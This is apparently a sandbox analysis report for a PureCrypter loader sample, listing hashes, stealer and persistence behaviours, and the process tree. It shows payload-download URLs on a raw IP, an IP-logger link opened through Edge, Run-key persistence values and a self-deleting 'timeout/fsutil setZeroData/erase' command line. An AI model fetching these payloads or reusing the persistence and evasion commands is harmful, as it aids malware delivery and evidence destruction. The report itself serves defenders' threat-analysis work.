purecrypter | 89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528

Analysis

max time kernel
137s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2023 14:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe
Size

288KB
MD5

d5c07326071e34b28ce94e867f11e03d
SHA1

e9ea832b7a9eb3078b703bbba9d9be31b0378d17
SHA256

89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528
SHA512

ad1a7a19fe727ca22f6dee9e3ed39bb8b1a7c253e463e0e85c4d23dfb50883dc599091a132a396f1144abf563b8cea6b255eb1d31996e59f99e1a94346f8c4b3
SSDEEP

6144:1ahO+wRfiRqJiU5c5r3K4UdIS5+MxcRFxEWBXnSCSWZpr:1iXMfiRqJij13KHdzXxcTzSCSS

Score

10^/10

purecrypter discovery downloader loader persistence spyware stealer

Malware Config

Extracted

Family

purecrypter

http://104.194.128.170/svp/Hfxbflp.mp3

http://104.194.128.170/svp/Enwpk.vdf

Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter

Executes dropped EXE 6 IoCs

pid	Process
2340	1untilmathematicsproie1.exe
4740	1untilmathematicspro.exe
3896	untilmathematics.exe
3236	untilmathematics.exe
4684	untilmathematics.exe
3748	untilmathematiics.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	1untilmathematicspro.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	1untilmathematicsproie1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3896 set thread context of 4684	3896	untilmathematics.exe	118

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
504	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1574508946-349927670-1185736483-1000\{C01C93B5-7BC9-4004-BA8A-7278DA31C26C}	msedge.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4964	msedge.exe
4964	msedge.exe
1904	msedge.exe
1904	msedge.exe
4004	msedge.exe
4004	msedge.exe
4164	identity_helper.exe
4164	identity_helper.exe
3896	untilmathematics.exe
3896	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe
4684	untilmathematics.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3896	untilmathematics.exe
Token: SeDebugPrivilege	3748	untilmathematiics.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe
1904	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 1212	3100	89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe	83
PID 3100 wrote to memory of 1212	3100	89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe	83
PID 1212 wrote to memory of 1904	1212	cmd.exe	85
PID 1212 wrote to memory of 1904	1212	cmd.exe	85
PID 3100 wrote to memory of 2340	3100	89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe	88
PID 3100 wrote to memory of 2340	3100	89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe	88
PID 2340 wrote to memory of 4740	2340	1untilmathematicsproie1.exe	89
PID 2340 wrote to memory of 4740	2340	1untilmathematicsproie1.exe	89
PID 1904 wrote to memory of 1132	1904	msedge.exe	91
PID 1904 wrote to memory of 1132	1904	msedge.exe	91
PID 4740 wrote to memory of 3896	4740	1untilmathematicspro.exe	90
PID 4740 wrote to memory of 3896	4740	1untilmathematicspro.exe	90
PID 4740 wrote to memory of 3896	4740	1untilmathematicspro.exe	90
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 5064	1904	msedge.exe	92
PID 1904 wrote to memory of 4964	1904	msedge.exe	93
PID 1904 wrote to memory of 4964	1904	msedge.exe	93
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94
PID 1904 wrote to memory of 476	1904	msedge.exe	94

C:\Users\Admin\AppData\Local\Temp\89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe
"C:\Users\Admin\AppData\Local\Temp\89ecd4d3608b88b795626091ab8e31b64009b32223b8cbc0120afb0b2005e528.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c lophime.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2TPq55
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdeee746f8,0x7ffdeee74708,0x7ffdeee74718
      4⤵
      PID:1132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
      4⤵
      PID:5064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
      4⤵
      PID:476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
      4⤵
      PID:2000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
      4⤵
      PID:4684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
      4⤵
      PID:2856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
      4⤵
      PID:3372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3740 /prefetch:8
      4⤵
      PID:2360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:4004
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
      4⤵
      PID:4364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
      4⤵
      PID:3260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
      4⤵
      PID:2344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
      4⤵
      PID:1080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:8
      4⤵
      PID:564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,7092707684089987722,1693912319075975311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4164
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1untilmathematicsproie1.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1untilmathematicsproie1.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1untilmathematicspro.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1untilmathematicspro.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3896
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        5⤵
        Executes dropped EXE
        
        PID:3236
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4684
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe" & erase "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe" & exit
        6⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:504
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe"
        7⤵
        
        PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3748

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d8f4eadb68a3e3d1bf2fa3006af5510

SHA1
d5d8239ec8a3bf5dadf52360350251d90d9e0142

SHA256
85a80218f4e5b578993436a6b8066b60508dd85a09579a4cb6757c2f9550d96c

SHA512
554773c4edd8456efaa23ac24970af5441e307424de3d2f41539c2cf854d57e7f725bf0c9986347fd3f2ff43efc8f69fd73c5d773bbfd504a99daca2b272a554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
360B

MD5
a1c957636d38236f0d7ba51293748a44

SHA1
76ea1b5263823c736c7b055100799734ce6e1ccc

SHA256
cd29589fb7e9b2f78fe599707ebefe858ef26274db31056be5796dd49608da1e

SHA512
1403022faa0859c78b3586e7c980a5f979f1e7c5a759859036b9bdbca6dbce80869019e72d412bb0669dc1ffd013229b8626660422dd852d5d6180dd673e8339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
cf429f2880bf72694f43a8a83d3bb54e

SHA1
a24fd225b20fed6d3c2b9212b43d389b20369ce5

SHA256
171bac6e14d79e50f50be70a66eb0099808283ce3b04560b585fa35dadf4ea4f

SHA512
6f967c16787dc1bc8044cf79496df4a96ca56b679ff3e1fe586145d6426a68a39432d0a518a23e611b7c8fee9431ee5937529e8cdcb01ad782090883ca3ede6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
1KB

MD5
aea4b3b59c3bf5a67fc197a08b81439b

SHA1
0067e8f97fe5ae80d9ad28b49c6aa054d99c2c5e

SHA256
4e677e8ad4efed2f8cda7f6a2b769eaac7a00cc8e06b17bed4d5d1ecb7e224c0

SHA512
05ea13beebcdd0df0c09c30371ffdc16c151fc42b127abf80e1082140298ee138e7be9f2a8b7d5cd369b2d1d875dd45f41cf9afe640683edf25fca725c09efa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
cd44691b6423fcac2a9d67ac3eb71b35

SHA1
d6bd3c998f15eb8ff6b56210a8a8743e1c2af838

SHA256
5069e19720b4ea25bd640b95d88baa23332239b46e2c3300de5214641facf1be

SHA512
b47f222e1f5470b0984f1dd8acee0d012395d6c8d717fd8b2978b6fdd292816258e7e9cde73472580c33e9b6ef9cb30e4053460f65c0e3654098d4f7a042d723

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2f5d8e18508fb5eff1efbed2012ad7bd

SHA1
03275ec44278dde08351ad958f9d8b961a465106

SHA256
d4325cc614a6d42d2de9545e60abce45930780778b9ef3b4a4a12109dd3f3e0f

SHA512
f2594e344869401a754dea7cbccf6a1baa87053d209b1bbc120399fbecf41179430661fcd2c7c7275a7991d79932a43023f9e63b2ad44e2ce24a47155a9ed8dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7c3c4b6ec3ab02b568e404e03b0f0a6a

SHA1
cb8f361152282ce9fa3799309c3534bcfb23be86

SHA256
4ce6b874e92a08cfb8cd76d6f2cc1a7f828435e63333f728eeedb6117e92cad2

SHA512
c02fb6b5293d88dc0d2334c9ac678b5db8f2d4aaacf87db9e058ca714f7c1c866067c35ba8b03903aea314327cdd82ae0f96c13a509da08df77aaec094461fb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
d985875547ce8936a14b00d1e571365f

SHA1
040d8e5bd318357941fca03b49f66a1470824cb3

SHA256
8455a012296a7f4b10ade39e1300cda1b04fd0fc1832ffc043e66f48c6aecfbf

SHA512
ca31d3d6c44d52a1f817731da2e7ac98402cd19eeb4b48906950a2f22f961c8b1f665c3eaa62bf73cd44eb94ea377f7e2ceff9ef682a543771344dab9dbf5a38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8020dc279ba18597cef9b3aef0fa15b3

SHA1
c8ec73e21a66d13f36aad3de1d7ff8841995229f

SHA256
d459e9e1ffbd83810770c60581122f4d06beba0be0aac340f4fbeb20902a6c50

SHA512
58d2bb6ee0ab45a0282125e8f5fe41b0f34897f89d17eccd4c70670d3937f5da1707da464019f7b36a331b8e40c8c29f8ebbca03101d42d683a9369996612df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7576ddb9bf9e2a0425afbf8528101c00

SHA1
b785375e1af3ed2360335382481f55283962e150

SHA256
bf00e41aa45f864d99ee0a5fbc72ca350783c77db43e791b68ddeb1851b40b76

SHA512
c315a9508937e985c0b2ee02514e2ab7832f0df096c1c4e122347f43a659fe6a907dfbf3fd6452e7d38af81251451d2cda2ae075095a1b6d2a0847f637be3bfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
85fea2f431d7601988408bd41b11190a

SHA1
8fbb850a918a09c7617218346fb4eb7e68ddf069

SHA256
579fdb98510fde8f06bc1f5b6e62e85441ee2e5c3f6832391cff48484bc96a53

SHA512
2a553271426986510328396026abe62f11d9c0173ac7311f882a1dedef8f2d98269b32ef488aa4bbbb3bb2af8e0f6fb89da22a5b53f82b35caede97bf5846c68

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1untilmathematicsproie1.exe

Filesize
257KB

MD5
